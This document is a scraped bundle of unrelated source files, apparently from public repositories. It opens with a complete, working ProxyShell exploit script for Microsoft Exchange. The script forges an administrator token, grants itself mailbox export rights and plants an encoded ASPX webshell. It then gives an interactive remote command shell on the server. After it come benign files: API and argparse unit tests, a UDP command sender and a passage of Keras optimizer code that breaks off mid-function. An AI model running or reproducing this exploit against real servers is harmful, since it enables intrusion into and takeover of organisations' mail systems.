] | 6 | 2021-08-19T03:05:38.000Z | 2021-12-15T11:39:12.000Z | proxyshell_mod.py | aravazhimdr/ProxyShell-POC-Mod | 03646720306b5dcd544c0a29388bda98020a07f0 | [
"MIT"
] | null | null | null | proxyshell_mod.py | aravazhimdr/ProxyShell-POC-Mod | 03646720306b5dcd544c0a29388bda98020a07f0 | [
"MIT"
] | 2 | 2021-10-04T10:09:10.000Z | 2022-02-17T19:54:18.000Z | #!/usr/bin/env python3
import argparse
import base64
import struct
import random
import string
import requests
import threading
import sys
import time
import re
import xml.etree.ElementTree as ET
from pypsrp.wsman import WSMan
from pypsrp.powershell import PowerShell, RunspacePool
"""
ProxyShell POC - @aravazhimdr
This exploit code is a merge of two POC. They both had pros & cons; So I merged them.
Credits to @donnymaasland & @ber_m1ng
"""
class ProxyShell:
def __init__(self, exchange_url, email, verify=False):
self.email = email
self.exchange_url = exchange_url if exchange_url.startswith('https://') else f'https://{exchange_url}'
self.rand_email = f'{rand_string()}@{rand_string()}.{rand_string(3)}'
self.rand_email_split = f'@{self.rand_email.split("@")[1]}'
self.sid = None
self.legacydn = None
self.rand_subj = rand_string(16)
self.session = requests.Session()
self.session.verify = False
self.session.headers = {
'Cookie': f'Email=autodiscover/autodiscover.json?a={self.rand_email}'
}
def post(self, endpoint, data, headers={}):
proxyDict = {
"http" : "http://127.0.0.1:8080",
"https" : "http://127.0.0.1:8080",
"ftp" : "http://127.0.0.1:8080"
}
url = f'{self.exchange_url}/autodiscover/autodiscover.json?a={self.rand_email}{endpoint}'
r = self.session.post(
url=url,
data=data,
headers=headers
#proxies=proxyDict
)
return r
def get_token(self):
self.token = self.gen_token()
def get_sid(self):
data = self.legacydn
data += '\x00\x00\x00\x00\x00\xe4\x04'
data += '\x00\x00\x09\x04\x00\x00\x09'
data += '\x04\x00\x00\x00\x00\x00\x00'
headers = {
"X-Requesttype": 'Connect',
"X-Clientinfo": '{2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}',
"X-Clientapplication": 'Outlook/15.0.4815.1002',
"X-Requestid": '{C715155F-2BE8-44E0-BD34-2960067874C8}:2',
'Content-Type': 'application/mapi-http'
}
r = self.post(
'/mapi/emsmdb',
data,
headers
)
self.sid = r.text.split("with SID ")[1].split(" and MasterAccountSid")[0]
def get_legacydn(self):
data = self.autodiscover_body()
headers = {'Content-Type': 'text/xml'}
r = self.post(
'/autodiscover/autodiscover.xml',
data,
headers
)
#print(r.content)
autodiscover_xml = ET.fromstring(r.content)
self.legacydn = autodiscover_xml.find(
'{*}Response/{*}User/{*}LegacyDN'
).text
def autodiscover_body(self):
autodiscover = ET.Element(
'Autodiscover',
xmlns='http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006'
)
request = ET.SubElement(autodiscover, 'Request')
ET.SubElement(request, 'EMailAddress').text = self.email
ET.SubElement(request, 'AcceptableResponseSchema').text = 'http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a'
return ET.tostring(
autodiscover,
encoding='unicode',
method='xml'
)
def gen_token(self):
# From: https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/
version = 0
ttype = 'Windows'
compressed = 0
auth_type = 'Kerberos'
raw_token = b''
gsid = 'S-1-5-32-544'
version_data = b'V' + (1).to_bytes(1, 'little') + (version).to_bytes(1, 'little')
type_data = b'T' + (len(ttype)).to_bytes(1, 'little') + ttype.encode()
compress_data = b'C' + (compressed).to_bytes(1, 'little')
auth_data = b'A' + (len(auth_type)).to_bytes(1, 'little') + auth_type.encode()
login_data = b'L' + (len(self.email)).to_bytes(1, 'little') + self.email.encode()
user_data = b'U' + (len(self.sid)).to_bytes(1, 'little') + self.sid.encode()
group_data = b'G' + struct.pack('<II', 1, 7) + (len(gsid)).to_bytes(1, 'little') + gsid.encode()
ext_data = b'E' + struct.pack('>I', 0)
raw_token += version_data
raw_token += type_data
raw_token += compress_data
raw_token += auth_data
raw_token += login_data
raw_token += user_data
raw_token += group_data
raw_token += ext_data
data = base64.b64encode(raw_token).decode()
return data
def rand_string(n=5):
return ''.join(random.choices(string.ascii_lowercase, k=n))
def exploit(proxyshell):
proxyshell.get_legacydn()
print(f'LegacyDN: {proxyshell.legacydn}')
proxyshell.get_sid()
print(f'SID: {proxyshell.sid}')
proxyshell.get_token()
print(f'Token: {proxyshell.token}')
def shell(command, port, proxyshell):
# From: https://y4y.space/2021/08/12/my-steps-of-reproducing-proxyshell/
if command.lower() in ['exit', 'quit']:
exit()
powershell_url = f'/Powershell?X-Rps-CAT={proxyshell.token}'
suffix = f'&Email=autodiscover/autodiscover.json%3F{proxyshell.rand_email_split}'
path = f'autodiscover/autodiscover.json?{proxyshell.rand_email_split}{powershell_url}{suffix}'
wsman = WSMan(proxyshell.exchange_url.replace("https://",""), path=path, ssl="true", port=443, cert_validation=False)
with RunspacePool(wsman, configuration_name='Microsoft.Exchange') as pool:
if command.lower().strip() == 'dropshell':
drop_shell(proxyshell)
#New-MailboxExportRequest might fail. Use New-ExchangeCertificate to get RCE
ps = PowerShell(pool)
ps.add_cmdlet('New-ManagementRoleAssignment').add_parameter('Role', 'Mailbox Import Export').add_parameter('User', proxyshell.email)
output = ps.invoke()
print("OUTPUT:\n%s" % "\n".join([str(s) for s in output]))
print("ERROR:\n%s" % "\n".join([str(s) for s in ps.streams.error]))
ps = PowerShell(pool)
ps.add_cmdlet(
'New-MailboxExportRequest'
).add_parameter(
'Mailbox', proxyshell.email
).add_parameter(
'FilePath', f'\\\\localhost\\c$\\inetpub\\wwwroot\\aspnet_client\\{proxyshell.rand_subj}.aspx'
).add_parameter(
'IncludeFolders', '#Drafts#'
).add_parameter(
'ContentFilter', f'Subject -eq \'{proxyshell.rand_subj}\''
)
output = ps.invoke()
print("OUTPUT:\n%s" % "\n".join([str(s) for s in output]))
print("ERROR:\n%s" % "\n".join([str(s) for s in ps.streams.error]))
shell_url = f'{proxyshell.exchange_url}/aspnet_client/{proxyshell.rand_subj}.aspx'
print(f'Shell URL: {shell_url}')
for i in range(10):
print(f'Testing shell {i}')
r = requests.get(shell_url, verify=proxyshell.session.verify)
if r.status_code == 200:
delimit = rand_string()
while True:
cmd = input('Shell> ')
if cmd.lower() in ['exit', 'quit']:
return
exec_code = f'Response.Write("{delimit}" + new ActiveXObject("WScript.Shell").Exec("cmd.exe /c {cmd}").StdOut.ReadAll() + "{delimit}");'
r = requests.get(
shell_url,
params={
'exec_code':exec_code
},
verify=proxyshell.session.verify
)
output = r.content.split(delimit.encode())[1]
print(output.decode())
time.sleep(5)
i += 1
print('Shell drop failed :(')
return
else:
ps = PowerShell(pool)
ps.add_script(command)
output = ps.invoke()
print("OUTPUT:\n%s" % "\n".join([str(s) for s in output]))
print("ERROR:\n%s" % "\n".join([str(s) for s in ps.streams.error]))
def get_args():
parser = argparse.ArgumentParser(description='ProxyShell example')
parser.add_argument('-u', help='Exchange URL', required=True)
parser.add_argument('-e', help='Email address', required=True)
parser.add_argument('-p', help='Local wsman port', default=8000, type=int)
return parser.parse_args()
def drop_shell(proxyshell):
data = f"""
<soap:Envelope
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages"
xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Header>
<t:RequestServerVersion Version="Exchange2016" />
<t:SerializedSecurityContext>
<t:UserSid>{proxyshell.sid}</t:UserSid>
<t:GroupSids>
<t:GroupIdentifier>
<t:SecurityIdentifier>S-1-5-21</t:SecurityIdentifier>
</t:GroupIdentifier>
</t:GroupSids>
</t:SerializedSecurityContext>
</soap:Header>
<soap:Body>
<m:CreateItem MessageDisposition="SaveOnly">
<m:Items>
<t:Message>
<t:Subject>{proxyshell.rand_subj}</t:Subject>
<t:Body BodyType="HTML">hello from darkness side</t:Body>
<t:Attachments>
<t:FileAttachment>
<t:Name>FileAttachment.txt</t:Name>
<t:IsInline>false</t:IsInline>
<t:IsContactPhoto>false</t:IsContactPhoto>
<t:Content>ldZUhrdpFDnNqQbf96nf2v+CYWdUhrdpFII5hvcGqRT/gtbahqXahoLZnl33BlQUt9MGObmp39opINOpDYzJ6Z45OTk52qWpzYy+2lz32tYUfoLaddpUKVTTDdqCD2uC9wbWqV3agskxvtrWadMG1trzRAYNMZ45OTk5IZ6V+9ZUhrdpFNk=</t:Content>
</t:FileAttachment>
</t:Attachments>
<t:ToRecipients>
<t:Mailbox>
<t:EmailAddress>{proxyshell.email}</t:EmailAddress>
</t:Mailbox>
</t:ToRecipients>
</t:Message>
</m:Items>
</m:CreateItem>
</soap:Body>
</soap:Envelope>
"""
headers = {
'Content-Type': 'text/xml',
'X-Anchormailbox': proxyshell.email
}
r = proxyshell.post(
f'/EWS/exchange.asmx/?X-Rps-CAT={proxyshell.token}',
data=data,
headers=headers
)
def main():
args = get_args()
exchange_url = args.u
email = args.e
local_port = args.p
proxyshell = ProxyShell(
exchange_url,
email
)
exploit(proxyshell)
while True:
shell(input('PS> '), local_port, proxyshell)
if __name__ == '__main__':
requests.packages.urllib3.disable_warnings(
requests.packages.urllib3.exceptions.InsecureRequestWarning
)
if not (sys.version_info.major == 3 and sys.version_info.minor >= 8):
print("This script requires Python 3.8 or higher!")
print("You are using Python {}.{}.".format(sys.version_info.major, sys.version_info.minor))
sys.exit(1)
main()
| 33.238938 | 217 | 0.582357 |
0e9c115319243033cc0bd738bc9b06fe980f1204 | 936 | py | Python | test/test_inline_response2004.py | metacore-io/metacore-api-client-python | 37d6127442e7a56deeedb88bf50b83e5d24fa7b0 | [
"MIT"
] | null | null | null | test/test_inline_response2004.py | metacore-io/metacore-api-client-python | 37d6127442e7a56deeedb88bf50b83e5d24fa7b0 | [
"MIT"
] | null | null | null | test/test_inline_response2004.py | metacore-io/metacore-api-client-python | 37d6127442e7a56deeedb88bf50b83e5d24fa7b0 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
Metacore IoT Object Storage API
Metacore Object Storage - IOT Core Services # noqa: E501
OpenAPI spec version: 1.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import metacore_api_python_cli
from models.inline_response2004 import InlineResponse2004 # noqa: E501
from metacore_api_python_cli.rest import ApiException
class TestInlineResponse2004(unittest.TestCase):
"""InlineResponse2004 unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testInlineResponse2004(self):
"""Test InlineResponse2004"""
# FIXME: construct object with mandatory attributes with example values
# model = metacore_api_python_cli.models.inline_response2004.InlineResponse2004() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 23.4 | 103 | 0.720085 |
c1209c65c498ab62c54677e916c6769384eb87de | 858 | py | Python | tests/unit/test_add_to_set.py | bobgautier/rjgtoys-cli | 9bfc689c230047b86c8fc9af9f7f446d18d54993 | [
"MIT"
] | null | null | null | tests/unit/test_add_to_set.py | bobgautier/rjgtoys-cli | 9bfc689c230047b86c8fc9af9f7f446d18d54993 | [
"MIT"
] | null | null | null | tests/unit/test_add_to_set.py | bobgautier/rjgtoys-cli | 9bfc689c230047b86c8fc9af9f7f446d18d54993 | [
"MIT"
] | null | null | null |
from argparse import ArgumentParser
from rjgtoys.cli._base import add_to_set, splitlist
def test_simple():
p = ArgumentParser()
p.add_argument('--item',help="Item to add",
action=add_to_set,type=int)
args = p.parse_args("--item 1 --item 2 --item 1".split(" "))
assert args.item == set((1,2))
def split(v):
return [int(item) for item in v.split(',')]
def test_multi():
p = ArgumentParser()
p.add_argument('--item',help="Item(s) to add",
action=add_to_set,type=split)
args = p.parse_args("--item 1,2 --item 1".split(" "))
assert args.item == set((1,2))
def test_multi_split():
p = ArgumentParser()
p.add_argument('--item',help="Item(s) to add",
action=add_to_set,type=splitlist(int))
args = p.parse_args("--item 1,2 --item 1".split(" "))
assert args.item == set((1,2))
| 22.578947 | 64 | 0.617716 |
fe0be31f78075e8910206012b7f39aec1e36c35f | 514 | py | Python | command_module/command_module.py | albertaloop/T_SWE_2019_2020 | 9095b6b64b5ca03c62bef9347945919bf3b79ed4 | [
"MIT"
] | null | null | null | command_module/command_module.py | albertaloop/T_SWE_2019_2020 | 9095b6b64b5ca03c62bef9347945919bf3b79ed4 | [
"MIT"
] | 22 | 2022-01-11T05:27:30.000Z | 2022-03-29T02:34:13.000Z | command_module/command_module.py | albertaloop/T_SWE_2019_2020 | 9095b6b64b5ca03c62bef9347945919bf3b79ed4 | [
"MIT"
] | null | null | null | import socket
import struct
from enum import IntEnum
class Command(IntEnum):
Start = 0
Stop = 1
class CommandManager:
def __init__(self, ip_address, port):
self.server = (ip_address, port)
self.sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def start(self):
packet = struct.pack(">B", Command.Start)
self.sock.sendto(packet, self.server)
def stop(self):
packet = struct.pack(">B", Command.Stop)
self.sock.sendto(packet, self.server) | 24.47619 | 68 | 0.653696 |
b704b885cb967997a7a8735b31f08a1537cf4a1c | 30,221 | py | Python | tensorflow/python/keras/optimizers.py | datanonymous/TFandroid | 89927e863b1ad96184ab09188f62b7e391c896d9 | [
"Apache-2.0"
] | 3 | 2019-02-04T10:10:19.000Z | 2019-12-29T08:09:37.000Z | tensorflow/python/keras/optimizers.py | datanonymous/TFandroid | 89927e863b1ad96184ab09188f62b7e391c896d9 | [
"Apache-2.0"
] | 1 | 2019-07-27T16:45:02.000Z | 2019-07-27T16:45:02.000Z | tensorflow/python/keras/optimizers.py | datanonymous/TFandroid | 89927e863b1ad96184ab09188f62b7e391c896d9 | [
"Apache-2.0"
] | 6 | 2018-11-29T20:52:00.000Z | 2021-02-19T22:43:32.000Z | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
# pylint: disable=invalid-name
"""Built-in optimizer classes.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import six
from six.moves import zip # pylint: disable=redefined-builtin
from tensorflow.python.distribute import distribution_strategy_context
from tensorflow.python.framework import ops
from tensorflow.python.keras import backend as K
from tensorflow.python.keras.optimizer_v2 import adadelta as adadelta_v2
from tensorflow.python.keras.optimizer_v2 import adagrad as adagrad_v2
from tensorflow.python.keras.optimizer_v2 import adam as adam_v2
from tensorflow.python.keras.optimizer_v2 import adamax as adamax_v2
from tensorflow.python.keras.optimizer_v2 import gradient_descent as gradient_descent_v2
from tensorflow.python.keras.optimizer_v2 import nadam as nadam_v2
from tensorflow.python.keras.optimizer_v2 import optimizer_v2
from tensorflow.python.keras.optimizer_v2 import rmsprop as rmsprop_v2
from tensorflow.python.keras.utils.generic_utils import deserialize_keras_object
from tensorflow.python.keras.utils.generic_utils import serialize_keras_object
from tensorflow.python.ops import clip_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.training import optimizer as tf_optimizer_module
from tensorflow.python.training import training_util
from tensorflow.python.training.checkpointable import base as checkpointable
from tensorflow.python.util.tf_export import keras_export
class Optimizer(object):
"""Abstract optimizer base class.
Note: this is the parent class of all optimizers, not an actual optimizer
that can be used for training models.
All Keras optimizers support the following keyword arguments:
clipnorm: float >= 0. Gradients will be clipped
when their L2 norm exceeds this value.
clipvalue: float >= 0. Gradients will be clipped
when their absolute value exceeds this value.
"""
def __init__(self, **kwargs):
allowed_kwargs = {'clipnorm', 'clipvalue'}
for k in kwargs:
if k not in allowed_kwargs:
raise TypeError('Unexpected keyword argument '
'passed to optimizer: ' + str(k))
# checks that clipnorm >= 0 and clipvalue >= 0
if kwargs[k] < 0:
raise ValueError('Expected {} >= 0, received: {}'.format(k, kwargs[k]))
self.__dict__.update(kwargs)
self.updates = []
self.weights = []
def get_updates(self, loss, params):
raise NotImplementedError
def get_gradients(self, loss, params):
"""Returns gradients of `loss` with respect to `params`.
Arguments:
loss: Loss tensor.
params: List of variables.
Returns:
List of gradient tensors.
Raises:
ValueError: In case any gradient cannot be computed (e.g. if gradient
function not implemented).
"""
grads = K.gradients(loss, params)
if None in grads:
raise ValueError('An operation has `None` for gradient. '
'Please make sure that all of your ops have a '
'gradient defined (i.e. are differentiable). '
'Common ops without gradient: '
'K.argmax, K.round, K.eval.')
if hasattr(self, 'clipnorm'):
grads = [clip_ops.clip_by_norm(g, self.clipnorm) for g in grads]
if hasattr(self, 'clipvalue'):
grads = [
clip_ops.clip_by_value(g, -self.clipvalue, self.clipvalue)
for g in grads
]
return grads
def set_weights(self, weights):
"""Sets the weights of the optimizer, from Numpy arrays.
Should only be called after computing the gradients
(otherwise the optimizer has no weights).
Arguments:
weights: a list of Numpy arrays. The number
of arrays and their shape must match
number of the dimensions of the weights
of the optimizer (i.e. it should match the
output of `get_weights`).
Raises:
ValueError: in case of incompatible weight shapes.
"""
params = self.weights
if len(params) != len(weights):
raise ValueError(
'Length of the specified weight list (' + str(len(weights)) +
') does not match the number of weights '
'of the optimizer (' + str(len(params)) + ')')
weight_value_tuples = []
param_values = K.batch_get_value(params)
for pv, p, w in zip(param_values, params, weights):
if pv.shape != w.shape:
raise ValueError(
'Optimizer weight shape ' + str(pv.shape) + ' not compatible with '
'provided weight shape ' + str(w.shape))
weight_value_tuples.append((p, w))
K.batch_set_value(weight_value_tuples)
def get_weights(self):
"""Returns the current value of the weights of the optimizer.
Returns:
A list of numpy arrays.
"""
return K.batch_get_value(self.weights)
def get_config(self):
config = {}
if hasattr(self, 'clipnorm'):
config['clipnorm'] = self.clipnorm
if hasattr(self, 'clipvalue'):
config['clipvalue'] = self.clipvalue
return config
@classmethod
def from_config(cls, config):
return cls(**config)
class SGD(Optimizer):
"""Stochastic gradient descent optimizer.
Includes support for momentum,
learning rate decay, and Nesterov momentum.
Arguments:
lr: float >= 0. Learning rate.
momentum: float >= 0. Parameter that accelerates SGD
in the relevant direction and dampens oscillations.
decay: float >= 0. Learning rate decay over each update.
nesterov: boolean. Whether to apply Nesterov momentum.
"""
def __init__(self, lr=0.01, momentum=0., decay=0., nesterov=False, **kwargs):
super(SGD, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
self.lr = K.variable(lr, name='lr')
self.momentum = K.variable(momentum, name='momentum')
self.decay = K.variable(decay, name='decay')
self.initial_decay = decay
self.nesterov = nesterov
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
self.updates = [state_ops.assign_add(self.iterations, 1)]
lr = self.lr
if self.initial_decay > 0:
lr = lr * ( # pylint: disable=g-no-augmented-assignment
1. / (1. + self.decay * math_ops.cast(self.iterations,
K.dtype(self.decay))))
# momentum
shapes = [K.int_shape(p) for p in params]
moments = [K.zeros(shape) for shape in shapes]
self.weights = [self.iterations] + moments
for p, g, m in zip(params, grads, moments):
v = self.momentum * m - lr * g # velocity
self.updates.append(state_ops.assign(m, v))
if self.nesterov:
new_p = p + self.momentum * v - lr * g
else:
new_p = p + v
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'momentum': float(K.get_value(self.momentum)),
'decay': float(K.get_value(self.decay)),
'nesterov': self.nesterov
}
base_config = super(SGD, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class RMSprop(Optimizer):
"""RMSProp optimizer.
It is recommended to leave the parameters of this optimizer
at their default values
(except the learning rate, which can be freely tuned).
This optimizer is usually a good choice for recurrent
neural networks.
Arguments:
lr: float >= 0. Learning rate.
rho: float >= 0.
epsilon: float >= 0. Fuzz factor. If `None`, defaults to `K.epsilon()`.
decay: float >= 0. Learning rate decay over each update.
"""
def __init__(self, lr=0.001, rho=0.9, epsilon=None, decay=0., **kwargs):
super(RMSprop, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.lr = K.variable(lr, name='lr')
self.rho = K.variable(rho, name='rho')
self.decay = K.variable(decay, name='decay')
self.iterations = K.variable(0, dtype='int64', name='iterations')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.initial_decay = decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
accumulators = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
self.weights = accumulators
self.updates = [state_ops.assign_add(self.iterations, 1)]
lr = self.lr
if self.initial_decay > 0:
lr = lr * ( # pylint: disable=g-no-augmented-assignment
1. / (1. + self.decay * math_ops.cast(self.iterations,
K.dtype(self.decay))))
for p, g, a in zip(params, grads, accumulators):
# update accumulator
new_a = self.rho * a + (1. - self.rho) * math_ops.square(g)
self.updates.append(state_ops.assign(a, new_a))
new_p = p - lr * g / (K.sqrt(new_a) + self.epsilon)
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'rho': float(K.get_value(self.rho)),
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon
}
base_config = super(RMSprop, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Adagrad(Optimizer):
"""Adagrad optimizer.
Adagrad is an optimizer with parameter-specific learning rates,
which are adapted relative to how frequently a parameter gets
updated during training. The more updates a parameter receives,
the smaller the updates.
It is recommended to leave the parameters of this optimizer
at their default values.
# Arguments
lr: float >= 0. Initial learning rate.
epsilon: float >= 0. If `None`, defaults to `K.epsilon()`.
decay: float >= 0. Learning rate decay over each update.
# References
- [Adaptive Subgradient Methods for Online Learning and Stochastic Optimization](http://www.jmlr.org/papers/volume12/duchi11a/duchi11a.pdf)
"""
def __init__(self, lr=0.01, epsilon=None, decay=0., **kwargs):
super(Adagrad, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.lr = K.variable(lr, name='lr')
self.decay = K.variable(decay, name='decay')
self.iterations = K.variable(0, dtype='int64', name='iterations')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.initial_decay = decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
shapes = [K.int_shape(p) for p in params]
accumulators = [K.zeros(shape) for shape in shapes]
self.weights = accumulators
self.updates = [state_ops.assign_add(self.iterations, 1)]
lr = self.lr
if self.initial_decay > 0:
lr = lr * ( # pylint: disable=g-no-augmented-assignment
1. / (1. + self.decay * math_ops.cast(self.iterations,
K.dtype(self.decay))))
for p, g, a in zip(params, grads, accumulators):
new_a = a + math_ops.square(g) # update accumulator
self.updates.append(state_ops.assign(a, new_a))
new_p = p - lr * g / (K.sqrt(new_a) + self.epsilon)
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon
}
base_config = super(Adagrad, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Adadelta(Optimizer):
"""Adadelta optimizer.
Adadelta is a more robust extension of Adagrad
that adapts learning rates based on a moving window of gradient updates,
instead of accumulating all past gradients. This way, Adadelta continues
learning even when many updates have been done. Compared to Adagrad, in the
original version of Adadelta you don't have to set an initial learning
rate. In this version, initial learning rate and decay factor can
be set, as in most other Keras optimizers.
It is recommended to leave the parameters of this optimizer
at their default values.
# Arguments
lr: float >= 0. Initial learning rate, defaults to 1.
It is recommended to leave it at the default value.
rho: float >= 0. Adadelta decay factor, corresponding to fraction of
gradient to keep at each time step.
epsilon: float >= 0. Fuzz factor. If `None`, defaults to `K.epsilon()`.
decay: float >= 0. Initial learning rate decay.
# References
- [Adadelta - an adaptive learning rate method](http://arxiv.org/abs/1212.5701)
"""
def __init__(self, lr=1.0, rho=0.95, epsilon=None, decay=0., **kwargs):
super(Adadelta, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.lr = K.variable(lr, name='lr')
self.decay = K.variable(decay, name='decay')
self.iterations = K.variable(0, dtype='int64', name='iterations')
if epsilon is None:
epsilon = K.epsilon()
self.rho = rho
self.epsilon = epsilon
self.initial_decay = decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
shapes = [K.int_shape(p) for p in params]
accumulators = [K.zeros(shape) for shape in shapes]
delta_accumulators = [K.zeros(shape) for shape in shapes]
self.weights = accumulators + delta_accumulators
self.updates = [state_ops.assign_add(self.iterations, 1)]
lr = self.lr
if self.initial_decay > 0:
lr = lr * ( # pylint: disable=g-no-augmented-assignment
1. / (1. + self.decay * math_ops.cast(self.iterations,
K.dtype(self.decay))))
for p, g, a, d_a in zip(params, grads, accumulators, delta_accumulators):
# update accumulator
new_a = self.rho * a + (1. - self.rho) * math_ops.square(g)
self.updates.append(state_ops.assign(a, new_a))
# use the new accumulator and the *old* delta_accumulator
update = g * K.sqrt(d_a + self.epsilon) / K.sqrt(new_a + self.epsilon)
new_p = p - lr * update
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
# update delta_accumulator
new_d_a = self.rho * d_a + (1 - self.rho) * math_ops.square(update)
self.updates.append(state_ops.assign(d_a, new_d_a))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'rho': self.rho,
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon
}
base_config = super(Adadelta, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Adam(Optimizer):
"""Adam optimizer.
Default parameters follow those provided in the original paper.
Arguments:
lr: float >= 0. Learning rate.
beta_1: float, 0 < beta < 1. Generally close to 1.
beta_2: float, 0 < beta < 1. Generally close to 1.
epsilon: float >= 0. Fuzz factor. If `None`, defaults to `K.epsilon()`.
decay: float >= 0. Learning rate decay over each update.
amsgrad: boolean. Whether to apply the AMSGrad variant of this
algorithm from the paper "On the Convergence of Adam and
Beyond".
"""
def __init__(self,
lr=0.001,
beta_1=0.9,
beta_2=0.999,
epsilon=None,
decay=0.,
amsgrad=False,
**kwargs):
super(Adam, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
self.lr = K.variable(lr, name='lr')
self.beta_1 = K.variable(beta_1, name='beta_1')
self.beta_2 = K.variable(beta_2, name='beta_2')
self.decay = K.variable(decay, name='decay')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.initial_decay = decay
self.amsgrad = amsgrad
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
self.updates = []
lr = self.lr
if self.initial_decay > 0:
lr = lr * ( # pylint: disable=g-no-augmented-assignment
1. / (1. + self.decay * math_ops.cast(self.iterations,
K.dtype(self.decay))))
with ops.control_dependencies([state_ops.assign_add(self.iterations, 1)]):
t = math_ops.cast(self.iterations, K.floatx())
lr_t = lr * (
K.sqrt(1. - math_ops.pow(self.beta_2, t)) /
(1. - math_ops.pow(self.beta_1, t)))
ms = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
vs = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
if self.amsgrad:
vhats = [K.zeros(K.int_shape(p), dtype=K.dtype(p)) for p in params]
else:
vhats = [K.zeros(1) for _ in params]
self.weights = [self.iterations] + ms + vs + vhats
for p, g, m, v, vhat in zip(params, grads, ms, vs, vhats):
m_t = (self.beta_1 * m) + (1. - self.beta_1) * g
v_t = (self.beta_2 * v) + (1. - self.beta_2) * math_ops.square(g)
if self.amsgrad:
vhat_t = math_ops.maximum(vhat, v_t)
p_t = p - lr_t * m_t / (K.sqrt(vhat_t) + self.epsilon)
self.updates.append(state_ops.assign(vhat, vhat_t))
else:
p_t = p - lr_t * m_t / (K.sqrt(v_t) + self.epsilon)
self.updates.append(state_ops.assign(m, m_t))
self.updates.append(state_ops.assign(v, v_t))
new_p = p_t
# Apply constraints.
if getattr(p, 'constraint', None) is not None:
new_p = p.constraint(new_p)
self.updates.append(state_ops.assign(p, new_p))
return self.updates
def get_config(self):
config = {
'lr': float(K.get_value(self.lr)),
'beta_1': float(K.get_value(self.beta_1)),
'beta_2': float(K.get_value(self.beta_2)),
'decay': float(K.get_value(self.decay)),
'epsilon': self.epsilon,
'amsgrad': self.amsgrad
}
base_config = super(Adam, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
class Adamax(Optimizer):
"""Adamax optimizer from Adam paper's Section 7.
It is a variant of Adam based on the infinity norm.
Default parameters follow those provided in the paper.
Arguments:
lr: float >= 0. Learning rate.
beta_1/beta_2: floats, 0 < beta < 1. Generally close to 1.
epsilon: float >= 0. Fuzz factor. If `None`, defaults to `K.epsilon()`.
decay: float >= 0. Learning rate decay over each update.
"""
def __init__(self,
lr=0.002,
beta_1=0.9,
beta_2=0.999,
epsilon=None,
decay=0.,
**kwargs):
super(Adamax, self).__init__(**kwargs)
with K.name_scope(self.__class__.__name__):
self.iterations = K.variable(0, dtype='int64', name='iterations')
self.lr = K.variable(lr, name='lr')
self.beta_1 = K.variable(beta_1, name='beta_1')
self.beta_2 = K.variable(beta_2, name='beta_2')
self.decay = K.variable(decay, name='decay')
if epsilon is None:
epsilon = K.epsilon()
self.epsilon = epsilon
self.initial_decay = decay
def get_updates(self, loss, params):
grads = self.get_gradients(loss, params)
self.updates = []
lr = self.lr
if self.initial_decay > 0:
lr = lr * ( # pylint: disable=g-no-augmented-assignment
